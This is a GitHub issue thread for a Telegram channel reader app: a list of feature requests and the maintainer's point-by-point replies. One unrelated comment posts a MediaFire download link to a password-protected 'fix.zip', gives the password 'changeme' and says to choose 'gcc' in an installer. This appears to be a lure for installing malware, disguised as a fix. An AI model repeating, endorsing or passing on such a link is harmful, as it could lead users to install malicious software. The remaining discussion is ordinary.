### ISSUE TITLE
List of suggestions 

### ISSUE THREAD

**Issue by CodexofLost** [therxmv/Dirol-Reader#9]
1. A search option for searching channels and an option to leave them too.
2. Ability to copy links from the post.
3. Ability to download images, videos, audio and other documents to the storage.
4. An option to open posts in telegram.
5. Ability to get notifications from channels.
6. Ability to view already viewed posts/news.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by therxmv** [comment]
1) Search - I'm not sure, but leave - yes
2) Yes, will try
3) Yes, but not the highest priority, so not soon
4) Will try, but I'm not sure that telegram supports this
5) Technically difficult, and I have all channels muted ;)
6) Never

Altogether these features will make a new tg client. What is useless imo, because we already have the best tg client LilGram - https://t.me/lildevelopment
